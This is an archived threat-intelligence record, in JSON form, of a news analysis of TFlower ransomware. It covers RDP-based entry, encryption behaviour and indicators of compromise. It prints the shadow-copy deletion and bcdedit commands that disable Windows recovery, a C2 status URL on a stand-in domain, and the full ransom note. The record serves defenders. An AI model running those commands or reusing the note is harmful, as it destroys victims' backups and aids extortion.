{
	"id": "4797a26d-925a-4355-be44-3d239e03aafe",
	"created_at": "2026-04-06T00:09:50.997752Z",
	"updated_at": "2026-04-10T03:19:58.759359Z",
	"deleted_at": null,
	"sha1_hash": "a83aad93bc8effc38090bfede64f63c47b4e4c11",
	"title": "TFlower Ransomware - The Latest Attack Targeting Businesses",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1736596,
	"plain_text": "TFlower Ransomware - The Latest Attack Targeting Businesses\r\nBy Lawrence Abrams\r\nPublished: 2019-09-17 · Archived: 2026-04-05 14:27:20 UTC\r\nThe latest ransomware targeting corporate environments is called TFlower. It is being installed on networks after attackers hack into exposed Remote Desktop services.\r\nWith the huge payments being earned by ransomware developers as they target businesses and government agencies, it is not surprising to see new ransomware being developed to take advantage of this surge in high ransoms.\r\nSuch is the case with the TFlower ransomware, which was discovered in the wild in early August. At the time it was thought to be just another generic ransomware, but sources who have performed incident response involving this ransomware have told BleepingComputer that its activity is beginning to pick up.\r\nhttps://www.bleepingcomputer.com/news/security/tflower-ransomware-the-latest-attack-targeting-businesses/\r\nPage 1 of 6\r\nGaining access via RDP\r\nTFlower is being installed in corporate networks through exposed Remote Desktop services that are being hacked by attackers.\r\nOnce the attackers gain access to a machine, they will infect that machine or may attempt to traverse the network with tools such as PowerShell Empire, PsExec, etc.\r\nWhen executed, the ransomware will display a console that shows the activity being performed by the ransomware while it is encrypting a computer.\r\nTFlower Console\r\nIt then connects back to the command and control server in order to report that it has started encrypting a computer. In one of the samples seen by BleepingComputer, this C2 is located on a hacked WordPress site and uses the following URL:\r\nhttps://www.domain.com/wp-includes/wp-merge.php?name=[computer_name]\u0026state=start\r\nIt will then attempt to clear the Shadow Volume Copies and execute commands that disable the Windows 10 repair environment:\r\nvssadmin.exe delete shadows /all /quiet\r\nbcdedit.exe /set {default} recoveryenabled no\r\nbcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nbcdedit.exe /set {current} recoveryenabled no\r\nbcdedit.exe /set {current} bootstatuspolicy ignoreallfailures\r\nIt also looks for and terminates the Outlook.exe process so that its data files can be opened for encryption.\r\nTerminating the outlook.exe process\r\nIt will then proceed to encrypt the data on the computer, skipping any files in the Windows or Sample Music folders.\r\nWhen encrypting files, it will not add an extension, but will prepend the *tflower marker and what appears to be the encrypted encryption key for the file, as shown below.\r\nEncrypted TFlower File\r\nWhen done encrypting a computer, it will send another status update to the C2 in the form of:\r\nhttps://www.domain.com/wp-includes/wp-merge.php?name=[computer_name]\u0026state=success%20[encrypted_file_count],%20retry%20[r\r\nVictims will then find ransom notes named !_Notice_!.txt placed throughout the computer and on the Windows Desktop.\r\nThis ransom note instructs victims to contact the flower.harris@protonmail.com or flower.harris@tutanota.com email addresses for payment instructions.\r\nTFlower Ransom Note\r\nIt is not known at this time how much the ransom amounts are.\r\nTFlower is still being researched, so it is not known at this time if there are any weaknesses in the encryption that could allow a user to get their files back for free.\r\nIOCs\r\nHashes:\r\n6c75998580fb05c01b10f4703299ffd782bec55c8765c030b8a4760fff6045fe\r\nAssociated Files:\r\n!_Notice_!.txt\r\nchilli.exe\r\nRegistry Entries:\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \"proxycap\"=\"[path_to]\\[ransomware].exe\"\r\nAssociated Email Addresses:\r\nflower.harris@protonmail.com\r\nflower.harris@tutanota.com\r\nRansom Note Text:\r\n IMPORTANT NOTICE THAT IS URGENT AND TRUE\r\n =================================================================\r\nDear Sir/Ma,\r\nSorry to inform you but many files of your COMPANY has just been ENCRYPTED with a STRONG key.\r\nThis simply means that you will not be able to use your files until it is decrypted by the same key used in encrypting it\r\nTO get the DECRYPT TOOL for your COMPANY, you have to make payment to us so as to recover your files.\r\n NOTE\r\n ======================================================================\r\nYou may upload 1 of your encrypted files to test the decryption for free.\r\nBut, the file should not contain any valuable information.\r\nE-MAIL Address:=\u003e\u003e\r\nflower.harris@protonmail.com\r\nflower.harris@tutanota.com\r\nSource: https://www.bleepingcomputer.com/news/security/tflower-ransomware-the-latest-attack-targeting-businesses/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.bleepingcomputer.com/news/security/tflower-ransomware-the-latest-attack-targeting-businesses/"
	],
	"report_names": [
		"tflower-ransomware-the-latest-attack-targeting-businesses"
	],
	"threat_actors": [],
	"ts_created_at": 1775434190,
	"ts_updated_at": 1775791198,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a83aad93bc8effc38090bfede64f63c47b4e4c11.pdf",
		"text": "https://archive.orkl.eu/a83aad93bc8effc38090bfede64f63c47b4e4c11.txt",
		"img": "https://archive.orkl.eu/a83aad93bc8effc38090bfede64f63c47b4e4c11.jpg"
	}
}